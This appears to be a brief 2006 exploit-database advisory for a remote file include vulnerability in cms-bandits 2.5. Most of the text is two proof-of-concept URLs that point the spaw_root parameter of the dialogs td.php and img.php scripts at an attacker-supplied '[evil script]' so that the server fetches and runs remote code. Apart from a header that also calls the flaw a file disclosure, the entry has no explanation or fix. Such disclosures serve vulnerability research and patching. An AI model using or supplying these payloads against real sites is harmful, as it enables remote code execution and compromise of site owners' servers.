id: 500
date: 06/07/2006
title: cms-bandits 2.5 (spaw_root) Remote File Include Vulnerabilities
author: Federico Fazzi
cves: 

===============================================================
cms-bandits 2.5 (spaw_root) Remote File Include Vulnerabilities
===============================================================



# Author:     Federico Fazzi
# Contact:    federico@autistici.org
# Date:       08/06/2006, 11:09
# Sinthesis:  cms-bandits 2.5, Remote file disclosure
# Product:    http://sourceforge.net/projects/cms-bandits

http://[site]/[cms-bandits]/dialogs/td.php?spaw_root=[evil script]
http://[site]/[cms-bandits]/dialogs/img.php?spaw_root=[evil script]




#  0day.today [2023-03-23]  #